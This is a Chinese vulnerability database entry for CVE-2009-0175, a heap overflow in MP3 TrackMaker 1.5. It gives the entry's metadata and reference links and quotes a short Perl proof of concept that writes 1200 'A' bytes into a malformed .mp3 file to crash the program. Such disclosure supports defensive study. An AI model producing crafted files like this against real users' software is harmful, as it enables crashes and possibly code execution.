Heathcosoft MP3 TrackMaker '.mp3'文件远程堆缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117221 漏洞类型 缓冲区溢出
发布时间 2009-01-09 更新时间 2009-01-29
CVE编号 CVE-2009-0175 CNNVD-ID CNNVD-200901-227
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7708
https://cxsecurity.com/issue/WLB-2009010170
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-227
|漏洞详情
HeathcoSoftwareMP3TrackMaker1.5版本中存在堆缓冲区溢出漏洞。远程攻击者可以借助一个无效的.mp3文件中的长字符串,引起拒绝服务攻击(应用程序崩溃)以及可能执行任意代码。
|漏洞EXP
# #!/bin/perl

# Author : HouSSamix

# MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC
# http://www.heathcosoft.com/software/mp3trackmaker/mp3tm15.exe

# open the program > browse (source file) > file exploit

#EAX 41414141  <<< 
#ECX 000000F8
#EDX 0000020A
#EBX 00000000
#ESP 0012F408
#EBP 0012F470
#ESI 00000000
#EDI 00000158
#EIP 7C91EB94 ntdll.KiFastSystemCallRet

print "===================================================================== \n";
print "Author : Houssamix  \n";
print "===================================================================== \n";
print "MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC						 \n";
print "===================================================================== \n\n";

my $file="hsmx.mp3";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE  "A" x 1200;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-09]
|参考资料

来源:XF
名称:mp3trackmaker-mp3-bo(47852)
链接:http://xforce.iss.net/xforce/xfdb/47852
来源:BID
名称:33183
链接:http://www.securityfocus.com/bid/33183
来源:MILW0RM
名称:7708
链接:http://www.milw0rm.com/exploits/7708
来源:SREASON
名称:4920
链接:http://securityreason.com/securityalert/4920